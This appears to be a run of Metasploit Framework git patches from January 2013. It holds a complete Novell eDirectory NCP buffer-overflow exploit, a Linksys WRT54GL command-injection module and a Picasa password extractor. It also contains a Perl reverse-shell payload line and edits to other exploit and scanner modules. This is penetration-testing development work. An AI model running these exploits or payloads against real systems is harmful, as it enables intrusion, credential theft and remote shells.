specialitems.add("WORDLIST"); specialitems.add("SESSION"); specialitems.add("REXE"); + specialitems.add("EXE::Custom"); + specialitems.add("EXE::Template"); + specialitems.add("USERNAME"); + specialitems.add("PASSWORD"); + specialitems.add("SMBUser"); + specialitems.add("SMBPass"); return new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { diff --git a/external/source/armitage/src/ui/ZoomableImage.java b/external/source/armitage/src/ui/ZoomableImage.java index 346438e15e2f..466f2c56d397 100644 --- a/external/source/armitage/src/ui/ZoomableImage.java +++ b/external/source/armitage/src/ui/ZoomableImage.java @@ -54,6 +54,8 @@ public void mouseReleased(MouseEvent ev) { check(ev); } }); + + setHorizontalAlignment(SwingConstants.CENTER); } protected void updateIcon() { diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index 5ea39884dd68..c1e03e579b70 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,32 @@ Armitage Changelog ================== +23 Jan 13 (tested against msf 16351) +--------- +- Added helpers to set EXE::Custom and EXE::Template options. +- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts +- Cleaned up Armitage -> SOCKS Proxy job management code. The code to + check if a proxy server is up was deadlock prone. Removed it. +- Starting SOCKS Proxy module now opens a tab displaying the module + start process. An event is posted to the event log too. +- Created an option helper to select credentials for SMBUser, SMBPass, + USERNAME, and PASSWORD. +- Added a feature to label hosts. A label will show up in its own column + in table view or below all info in graph view. Any team member may + change a label through [host] -> host -> Set Label. You may also use + dynamic workspaces to show hosts with certain labels attached. +- Fixed bad things happening when connecting Armitage to 'localhost' and + not '127.0.0.1'. +- Screenshots and Webcam shots are now centered in their tab. +- Added an alternate .bat file to start msfrpcd on Windows in the + Metasploit 4.5 installer's environment. +- Added a color-style for [!] warning messages + +Cortana Updates (for scripters) +-------- +- &handler function now works as advertised. +- Cortana now avoids use of core.setg + 4 Jan 13 (tested against msf 16252) -------- - Added a helper to set REXE option From 933f8077450393465bb7e2d0244b5c06d75d0792 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 22 Jan 2013 23:53:00 -0600 Subject: [PATCH 105/421] Msftidy cleanup + handling return values better --- .../gather/credentials/enum_picasa_pwds.rb | 59 +++++++++---------- 1 file changed, 27 insertions(+), 32 deletions(-) diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 5ec210987d0b..8977cbcc5e33 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -19,18 +19,18 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Google Picasa Password Extractor', + 'Name' => 'Windows Gather Google Picasa Password Extractor', 'Description' => %q{ This module extracts and decrypts the login passwords stored by Google Picasa. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'SecurityXploded Team', #www.SecurityXploded.com 'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>', ], - 'Platform' => [ 'win' ], + 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end @@ -70,14 +70,12 @@ def decrypt_password(data) end def get_registry - + begin print_status("Looking in registry for stored login passwords by Picasa ...") - username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", - 'GaiaEmail') - password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", - 'GaiaPass') + username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaEmail') || '' + password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaPass') || '' credentials = Rex::Ui::Text::Table.new( 'Header' => "Picasa Credentials", @@ -87,59 +85,56 @@ def get_registry "User", "Password" ]) - - + foundcreds = 0 - if username != nil and password != nil + if !username.empty? and !password.empty? passbin = [password].pack("H*") pass = decrypt_password(passbin) - if pass != nil + if pass and !pass.empty? print_status("Found Picasa 2 credentials.") - print_good("Username: #{username}\t Password: #{pass}") - + print_good("Username: #{username}\t Password: #{pass}") + foundcreds = 1 credentials << [username,pass] - end end #For early versions of Picasa3 - username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", - 'GaiaEmail') - password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", - 'GaiaPass') + username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaEmail') || '' + password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaPass') || '' - if username != nil and password != nil + if !username.empty? and !password.empty? passbin = [password].pack("H*") pass = decrypt_password(passbin) - if pass != nil + if pass and !pass.empty? print_status("Found Picasa 3 credentials.") - print_good("Username: #{username}\t Password: #{pass}") + print_good("Username: #{username}\t Password: #{pass}") foundcreds = 1 credentials << [username,pass] end end - + if foundcreds == 1 path = store_loot( - "picasa.creds", - "text/csv", - session, - credentials.to_csv, - "decrypted_picasa_data.csv", - "Decrypted Picasa Passwords") + "picasa.creds", + "text/csv", + session, + credentials.to_csv, + "decrypted_picasa_data.csv", + "Decrypted Picasa Passwords" + ) print_status("Decrypted passwords saved in: #{path}") - else + else print_status("No Picasa credentials found.") end rescue ::Exception => e - print_error("An error has occurred: #{e.to_s}") + print_error("An error has occurred: #{e.to_s}") end end From 5cfabb0443df2a2ae5d1d2a849a2100b7f8f57c9 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 00:15:09 -0600 Subject: [PATCH 106/421] Apply the changes I suggested before --- .../http/coldfusion_locale_traversal.rb | 22 ++++++++----------- 1 file changed, 9 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index 06874e30c7ee..caa420175688 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -49,8 +49,8 @@ def initialize register_options( [ - OptString.new('FILE', [ false, 'File to retrieve (make sure path/file match OS (ie, /etc/passwd on Windows == dumb))', '']), - OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false]), + OptString.new('FILE', [ false, 'File to retrieve', '']), + OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false]) ], self.class) end @@ -115,7 +115,8 @@ def run_host(ip) 'method' => 'GET', 'Connection' => "keep-alive", 'Accept-Encoding' => "zip,deflate", - }, 10) + }) + return if not res or not res.body or not res.code if (res.code.to_i == 200) @@ -172,19 +173,19 @@ def run_host(ip) 'Connection' => "keep-alive", 'Accept-Encoding' => "zip,deflate", }, - }, -1) + }) if (res.nil?) print_error("no response for #{ip}:#{rport} #{url}") elsif (res.code == 200) #print_error("#{res.body}")#debug - out << "URL: #{ip}#{url}#{locale}#{trav}\n" - if match = res.body.match(/\<title\>(.*)\<\/title\>/im) + print_status("URL: #{ip}#{url}#{locale}#{trav}") + if res.body.match(/\<title\>(.*)\<\/title\>/im) fileout = $1 if(fileout !~ /Login$/ and fileout !~ /^Welcome to ColdFusion/ and fileout !~ /^Archives and Deployment/) - out << "#{ip} FILE:\n#{fileout}\r\n" - break + print_good("#{ip} FILE: #{fileout}") + break end end else @@ -192,11 +193,6 @@ def run_host(ip) print_error("#{ip} #{res.inspect}") end end - if(out =~ /FILE/) - print_good(out) - else - print_status(out) - end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError rescue ::Timeout::Error, ::Errno::EPIPE From 9c9a0d1664f16e626943811414aa6a1253fc7f45 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 23 Jan 2013 10:51:29 +0100 Subject: [PATCH 107/421] Added module for cve-2012-0432 --- .../linux/misc/novell_edirectory_ncp_bof.rb | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb new file mode 100644 index 000000000000..12a79339b61f --- /dev/null +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -0,0 +1,133 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell eDirectory Buffer Overflow', + 'Description' => %q{ + This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The + vulnerability exists in the ndsd daemon, specifically in the NCP service, while + parsing a specially crafted Keyed Object Login request. It allows remote code + execution with root privileges. + }, + 'Author' => + [ + 'David Klein', # Vulnerability Discovery + 'Gary Nilson', # Exploit + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0432'], + [ 'OSVDB', '88718'], + [ 'BID', '57038' ], + [ 'EDB', '24205' ], + [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=3426981' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2013/Jan/97' ] + ], + 'DisclosureDate' => 'Dec 12 2012', + 'Platform' => 'linux', + 'Privileged' => true, + 'Arch' => ARCH_X86, + 'Payload' => + { + + }, + 'Targets' => + [ + [ 'Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3', + { + 'Ret' => 0x080a4697, # jmp esi from ndsd + 'Offset' => 58 + } + ] + ], + 'DefaultTarget' => 0 + )) + + register_options([Opt::RPORT(524),], self.class) + end + + def check + connect + sock.put(connection_request) + res = sock.get + disconnect + if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 + # res[8,2] => Reply Type + # res[15,1] => Connection Status + return Exploit::CheckCode::Safe + end + return Exploit::CheckCode::Detected + end + + def connection_request + pkt = "\x44\x6d\x64\x54" # NCP TCP id + pkt << "\x00\x00\x00\x17" # request_size + pkt << "\x00\x00\x00\x01" # version + pkt << "\x00\x00\x00\x00" # reply buffer size + pkt << "\x11\x11" # cmd => create service connection + pkt << "\x00" # sequence number + pkt << "\x00" # connection number + pkt << "\x00" # task number + pkt << "\x00" # reserved + pkt << "\x00" # request code + + return pkt + end + + def exploit + + connect + + print_status("Sending Service Connection Request...") + sock.put(connection_request) + res = sock.get + if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 + # res[8,2] => Reply Type + # res[15,1] => Connection Status + fail_with(Exploit::Failure::UnexpectedReply, "Service Connection failed") + end + print_good("Service Connection successful") + + pkt = "\x44\x6d\x64\x54" # NCP TCP id + pkt << "\x00\x00\x00\x00" # request_size (filled later) + pkt << "\x00\x00\x00\x01" # version (1) + pkt << "\x00\x00\x00\x05" # reply buffer size + pkt << "\x22\x22" # cmd + pkt << "\x01" # sequence number + pkt << res[11] # connection number + pkt << "\x00" # task number + pkt << "\x00" # reserved + pkt << "\x17" # Login Object FunctionCode (23) + pkt << "\x00\xa7" # SubFuncStrucLen + pkt << "\x18" # SubFunctionCode + pkt << "\x90\x90" # object type + pkt << "\x50" # ClientNameLen + pkt << rand_text(7) + jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string + pkt << jmp_payload # first byte is the memcpy length, must be bigger than 62 to to overwrite EIP + pkt << rand_text(target['Offset'] - jmp_payload.length) + pkt << [target.ret].pack("V") + pkt << payload.encoded + + pkt[4,4] = [pkt.length].pack("N") + + print_status("Sending Overflow on Keyed Object Login...") + sock.put(pkt) + sock.get + disconnect + end + +end From 17d1c9f996de1bd4c7e674635f0be4a507216895 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 10:29:11 +0000 Subject: [PATCH 108/421] - expanded description - updated references --- .../multi/http/movabletype_upgrade_exec.rb | 38 ++++++++----------- 1 file changed, 16 insertions(+), 22 deletions(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 40764c27b971..6b46f40b8fc7 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -7,23 +7,6 @@ require 'msf/core' -### -# -# The vulnerability arises due to the following properties: -# -# 1: This script may be invoked remotely without requiring authentication to any MT -# instance. -# -# 2: Through a crafted POST request, it is possible to invoke particular -# database migration functions (i.e functions that bring the existing database -# up-to-date with an updated codebase) by name and with particular parameters. -# -# 3: A particular migration function, core_drop_meta_for_table, allows a class -# parameter to be set which is used directly in a perl eval statement, allowing -# perl code injection. -# -### - class Metasploit4 < Msf::Exploit::Remote include Exploit::Remote::HttpClient @@ -32,19 +15,30 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution', 'Description' => %q{ - This module can be used to execute a payload on MoveableType (MT) - thatexposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), + This module can be used to execute a payload on MoveableType (MT) that + exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), that is used during installation and updating of the platform. + The vulnerability arises due to the following properties: + 1. This script may be invoked remotely without requiring authentication + to any MT instance. + 2. Through a crafted POST request, it is possible to invoke particular + database migration functions (i.e functions that bring the existing + database up-to-date with an updated codebase) by name and with + particular parameters. + 3. A particular migration function, core_drop_meta_for_table, allows + a class parameter to be set which is used directly in a perl eval + statement, allowing perl code injection. }, 'Author' => [ 'Kacper Nowak', - 'Nick Blundell', - "Gary O'Leary-Steele", + 'Nick Blundell', + "Gary O'Leary-Steele" ], 'References' => [ - ['CVE', '2012-6315'], + #['CVE', '2012-6315'], superseded by CVE-2013-0209 (duplicate) + ['CVE', '2013-0209'], ['URL', 'http://www.sec-1.com/blog/?p=402'], ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] ], From 5d6ca30422d6c0e33af89075382428433968c3a7 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 10:33:55 +0000 Subject: [PATCH 109/421] removed spaces at EOL --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 6b46f40b8fc7..fb7dc3010cd5 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -32,7 +32,7 @@ def initialize(info = {}) 'Author' => [ 'Kacper Nowak', - 'Nick Blundell', + 'Nick Blundell', "Gary O'Leary-Steele" ], 'References' => From 3a5e92ba6ff92e1e47cdc084912b7aa12f6e0b10 Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Wed, 23 Jan 2013 12:15:34 +0100 Subject: [PATCH 110/421] hopefully all fixex included --- .../admin/http/linksys_wrt54gl_exec.rb | 113 +++++++++++++----- 1 file changed, 80 insertions(+), 33 deletions(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 85d8c93afa3c..8f270248e433 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -16,7 +16,7 @@ def initialize(info = {}) 'Name' => 'Linksys WRT54GL Remote Command Execution', 'Description' => %q{ Some Linksys Routers are vulnerable to OS Command injection. - You will need credentials to the webinterface to access the vulnerable part + You will need credentials to the web interface to access the vulnerable part of the application. Default credentials are always a good starting point. admin/admin or admin and blank password could be a first try. @@ -34,8 +34,10 @@ def initialize(info = {}) [ [ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ], + [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ], [ 'EDB', '24202' ], [ 'BID', '57459' ], + [ 'OSVDB', '89421' ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 18 2013')) @@ -43,12 +45,12 @@ def initialize(info = {}) register_options( [ Opt::RPORT(80), - OptString.new('VULNPATH',[ true, 'PATH to OS Command Injection', '/apply.cgi']), - OptString.new('USER',[ true, 'User to login with', 'admin']), - OptString.new('PASS',[ true, 'Password to login with', 'password']), + OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), - OptString.new('LANIP', [ false, 'LAN IP address of the router', '<RHOST>']), + OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']), OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']), @@ -56,46 +58,41 @@ def initialize(info = {}) end def run - #setting up the needed variables - uri = datastore['VULNPATH'] - user = datastore['USER'] + #setting up some basic variables + uri = datastore['TARGETURI'] + user = datastore['USERNAME'] rhost = datastore['RHOST'] netmask = datastore['NETMASK'] routername = datastore['ROUTER_NAME'] wandomain = datastore['WAN_DOMAIN'] wanmtu = datastore['WAN_MTU'] - # using the RHOST for the correct lan IP settings - # WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device! - if datastore['LANIP'] !~ /<RHOST>/ + if datastore['LANIP'] !~ /1.1.1.1/ + #there is a configuration from the user so we use LANIP for the router configuration ip = datastore['LANIP'].split('.') else + #no configuration from user so we use RHOST for the router configuration ip = rhost.split('.') end # not sure if this is a good way for blank passwords: - if datastore['PASS'] == "<BLANK>" + if datastore['PASSWORD'] == "<BLANK>" pass = "" else - pass = datastore['PASS'] + pass = datastore['PASSWORD'] end print_status("Trying to login with #{user} / #{pass}") - user_pass = Rex::Text.encode_base64(user + ":" + pass) - begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } - }, 25) + 'basic_auth' => "#{user}:#{pass}" + }) unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") + vprint_error("#{rhost} not responding") end return :abort if (res.code == 404) @@ -108,16 +105,17 @@ def run end rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") + vprint_error("#{rhost} - Failed to connect to the web server") return :abort end print_status("Sending remote command: " + datastore['CMD']) - cmd = Rex::Text.uri_encode(datastore['CMD']) - #cmd = datastore['CMD'] + # cmd = Rex::Text.uri_encode(datastore['CMD']) + cmd = datastore['CMD'] - data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" + #original Post Request: +# data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" if datastore['VERBOSE'] == true print_line("using the following target URL: \n#{uri}") @@ -128,17 +126,66 @@ def run { 'uri' => uri, 'method' => 'POST', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - }, - 'data' => data_cmd, - }, 20) + 'basic_auth' => "#{pass}:#{pass}", + #'data' => data_cmd, + + 'vars_post' => + { + 'submit_button' => "index", + 'change_action' => "1", + 'submit_type' => "1", + 'action' => "Apply", + 'now_proto' => "dhcp", + 'daylight_time' => "1", + 'lan_ipaddr' => "4", + 'wait_time' => "0", + 'need_reboot' => "0", + 'ui_language' => "de", + 'wan_proto' => "dhcp", + 'router_name' => "#{routername}", + 'wan_hostname' => "`#{cmd}`", + 'wan_domain' => "#{wandomain}", + 'mtu_enable' => "1", + 'wan_mtu' => "#{wanmtu}", + 'lan_ipaddr_0' => "#{ip[0]}", + 'lan_ipaddr_1' => "#{ip[1]}", + 'lan_ipaddr_2' => "#{ip[2]}", + 'lan_ipaddr_3' => "#{ip[3]}", + 'lan_netmask' => "#{netmask}", + 'lan_proto' => "dhcp", + 'dhcp_check' => "1", + 'dhcp_start' => "100", + 'dhcp_num' => "50", + 'dhcp_lease' => "0", + 'wan_dns' => "4", + 'wan_dns0_0' => "0", + 'wan_dns0_1' => "0", + 'wan_dns0_2' => "0", + 'wan_dns0_3' => "0", + 'wan_dns1_0' => "0", + 'wan_dns1_1' => "0", + 'wan_dns1_2' => "0", + 'wan_dns1_3' => "0", + 'wan_dns2_0' => "0", + 'wan_dns2_1' => "0", + 'wan_dns2_2' => "0", + 'wan_dns2_3' => "0", + 'wan_wins' => "4", + 'wan_wins_0' => "0", + 'wan_wins_1' => "0", + 'wan_wins_2' => "0", + 'wan_wins_3' => "0", + 'time_zone' => "-08+1+1", + '_daylight_time' => '1' + }, + }) rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") + vprint_error("#{rhost} - Failed to connect to the web server") return :abort end - print_status("Blind Exploitation - wait 5 seconds until the configuration gets applied\n") + print_line("") + print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed") print_status("Blind Exploitation - unknown Exploitation state\n") end end + From f691652594e3ca9e6c035303755ace4f254d2aeb Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 11:21:44 +0000 Subject: [PATCH 111/421] attempt to fix cmd/windows/reverse_perl payload --- modules/payloads/singles/cmd/windows/reverse_perl.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index 37bb01b97d3a..837e089ef689 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -48,7 +48,7 @@ def command_string lhost = datastore['LHOST'] ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" + cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"} end end From d2b75ad0058a093368a2566a561e83b82859135b Mon Sep 17 00:00:00 2001 From: booboule <booboule@gmail.com> Date: Wed, 23 Jan 2013 12:42:33 +0100 Subject: [PATCH 112/421] Update external/source/exploits/cve-2012-5088/Makefile --- external/source/exploits/cve-2012-5088/Makefile | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/external/source/exploits/cve-2012-5088/Makefile b/external/source/exploits/cve-2012-5088/Makefile index abc39b7a2c0d..226cdcd65c90 100755 --- a/external/source/exploits/cve-2012-5088/Makefile +++ b/external/source/exploits/cve-2012-5088/Makefile @@ -9,8 +9,8 @@ CLASSES = \ all: $(CLASSES:.java=.class) install: - mv Exploit.class ../../../../data/exploits/cve-2013-0422/ - mv B.class ../../../../data/exploits/cve-2013-0422/ + mv Exploit.class ../../../../data/exploits/cve-2012-5088/ + mv B.class ../../../../data/exploits/cve-2012-5088/ clean: rm -rf *.class From e78174297eb116c1d59f2492d9361f059a9e99a8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 23 Jan 2013 12:44:55 +0100 Subject: [PATCH 113/421] assuring stdapi loads on meterpreter --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 5e710b117d32..f786338546cf 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -69,6 +69,12 @@ def initialize(info = {}) ], self.class) end + + def on_new_session + + end + + def generate_jsp var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) From a3fa7cc6bc4dcb86340ef0388dc0c535b9030a4a Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 12:49:08 +0000 Subject: [PATCH 114/421] adjusted disclosure date --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index fb7dc3010cd5..1802c450bb4b 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -60,7 +60,7 @@ def initialize(info = {}) ['Movable Type 4.2x, 4.3x', {}] ], 'Privileged' => false, - 'DisclosureDate' => "Jan 08 2013", + 'DisclosureDate' => "Jan 07 2013", 'DefaultTarget' => 0)) register_options( From 1477cda3d45e17ebdce53522701019c742646ff1 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 10:00:24 -0600 Subject: [PATCH 115/421] fix set_rhosts behavior/bugs. msf exploit(rails_xml_yaml_code_exec) > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.0.0.105 00:0C:29:59:65:08 VMWIN2000SP4 Microsoft Windows client msf exploit(rails_xml_yaml_code_exec) > hosts -R Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.0.0.105 00:0C:29:59:65:08 VMWIN2000SP4 Microsoft Windows client RHOSTS => 10.0.0.105 msf exploit(rails_xml_yaml_code_exec) > exit --- lib/msf/ui/console/command_dispatcher/db.rb | 14 +++----------- 1 file changed, 3 insertions(+), 11 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 853722721370..60fe17e59243 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -205,6 +205,7 @@ def cmd_hosts(*args) mode = :search delete_count = 0 + rhosts = [] host_ranges = [] search_term = nil @@ -241,7 +242,6 @@ def cmd_hosts(*args) output = args.shift when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi @@ -280,12 +280,6 @@ def cmd_hosts(*args) range.each do |address| host = framework.db.find_or_create_host(:host => address) print_status("Time: #{host.created_at} Host: host=#{host.address}") - if set_rhosts - # only unique addresses - addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr - end - rhosts.uniq! end end return @@ -326,7 +320,6 @@ def cmd_hosts(*args) addr = (host.scope ? host.address + '%' + host.scope : host.address ) rhosts << addr end - rhosts.uniq! if mode == :delete 